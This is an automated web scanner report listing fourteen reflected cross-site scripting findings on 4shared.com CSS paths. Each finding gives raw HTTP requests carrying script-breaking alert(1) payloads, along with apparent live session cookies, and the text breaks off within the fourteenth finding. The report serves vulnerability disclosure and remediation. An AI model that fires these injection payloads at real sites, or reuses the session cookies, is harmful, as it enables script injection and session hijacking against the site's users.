In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.4shared.com/css/indexm.css [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3baf0'-alert(1)-'a5461f0d075 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css3baf0'-alert(1)-'a5461f0d075/indexm.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css3baf0'-alert(1)-'a5461f0d075/indexm.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:35 GMT
Content-Length: 38611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css3baf0'-alert(1)-'a5461f0d075/indexm.css',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fu
...[SNIP]...

2.2. http://www.4shared.com/css/indexm.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4e70"-alert(1)-"dc2712cf856 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssc4e70"-alert(1)-"dc2712cf856/indexm.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssc4e70&quot;-alert(1)-&quot;dc2712cf856/indexm.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:33 GMT
Content-Length: 38615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cssc4e70"-alert(1)-"dc2712cf856/indexm.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.3. http://www.4shared.com/css/indexm.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 163d3'-alert(1)-'dc0771bb49c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexm.css163d3'-alert(1)-'dc0771bb49c?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/indexm.css163d3'-alert(1)-'dc0771bb49c
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:47 GMT
Content-Length: 38780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/indexm.css163d3'-alert(1)-'dc0771bb49c',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.4. http://www.4shared.com/css/indexm.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9600"-alert(1)-"1a36a1d04bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexm.csse9600"-alert(1)-"1a36a1d04bf?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/indexm.csse9600&quot;-alert(1)-&quot;1a36a1d04bf
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:45 GMT
Content-Length: 38785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/indexm.csse9600"-alert(1)-"1a36a1d04bf";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.5. http://www.4shared.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daa3d'-alert(1)-'6d4683f78b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssdaa3d'-alert(1)-'6d4683f78b5/main.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /cssdaa3d'-alert(1)-'6d4683f78b5/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:40 GMT
Content-Length: 38632


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/cssdaa3d'-alert(1)-'6d4683f78b5/main.css',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.6. http://www.4shared.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 148d7"-alert(1)-"2b21ef84d68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css148d7"-alert(1)-"2b21ef84d68/main.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css148d7&quot;-alert(1)-&quot;2b21ef84d68/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:38 GMT
Content-Length: 38809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css148d7"-alert(1)-"2b21ef84d68/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.7. http://www.4shared.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbf19"-alert(1)-"19dccd4f627 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.cssfbf19"-alert(1)-"19dccd4f627?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/main.cssfbf19&quot;-alert(1)-&quot;19dccd4f627
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:54 GMT
Content-Length: 38628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.cssfbf19"-alert(1)-"19dccd4f627";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.8. http://www.4shared.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c7b'-alert(1)-'bd4abc066e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.cssd9c7b'-alert(1)-'bd4abc066e7?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/main.cssd9c7b'-alert(1)-'bd4abc066e7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:56 GMT
Content-Length: 38812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
of loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/main.cssd9c7b'-alert(1)-'bd4abc066e7',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.9. http://www.4shared.com/css/mobile20.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mobile20.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30154"-alert(1)-"3a75761dc33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css30154"-alert(1)-"3a75761dc33/mobile20.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css30154&quot;-alert(1)-&quot;3a75761dc33/mobile20.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:51 GMT
Content-Length: 38801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css30154"-alert(1)-"3a75761dc33/mobile20.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.10. http://www.4shared.com/css/mobile20.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mobile20.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a47f7'-alert(1)-'7de5db1bfe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa47f7'-alert(1)-'7de5db1bfe9/mobile20.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssa47f7'-alert(1)-'7de5db1bfe9/mobile20.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:53 GMT
Content-Length: 38799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/cssa47f7'-alert(1)-'7de5db1bfe9/mobile20.css',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}


...[SNIP]...

2.11. http://www.4shared.com/css/mobile20.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mobile20.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d7fe'-alert(1)-'d8c3121ef84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mobile20.css8d7fe'-alert(1)-'d8c3121ef84?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mobile20.css8d7fe'-alert(1)-'d8c3121ef84
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:10 GMT
Content-Length: 38805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
oginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/mobile20.css8d7fe'-alert(1)-'d8c3121ef84',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.12. http://www.4shared.com/css/mobile20.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mobile20.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613a7"-alert(1)-"7374be32ded was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mobile20.css613a7"-alert(1)-"7374be32ded?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mobile20.css613a7&quot;-alert(1)-&quot;7374be32ded
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:05 GMT
Content-Length: 38622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/mobile20.css613a7"-alert(1)-"7374be32ded";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.13. http://www.4shared.com/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdd0'-alert(1)-'84bbcefcaaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /csscbdd0'-alert(1)-'84bbcefcaaa/style.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /csscbdd0'-alert(1)-'84bbcefcaaa/style.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:05:50 GMT
Content-Length: 38817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/csscbdd0'-alert(1)-'84bbcefcaaa/style.css',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

2.14. http://www.4shared.com/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963c0"-alert(1)-"d0f9ab9eff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css963c0"-alert(1)-"d0f9ab9eff7/style.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
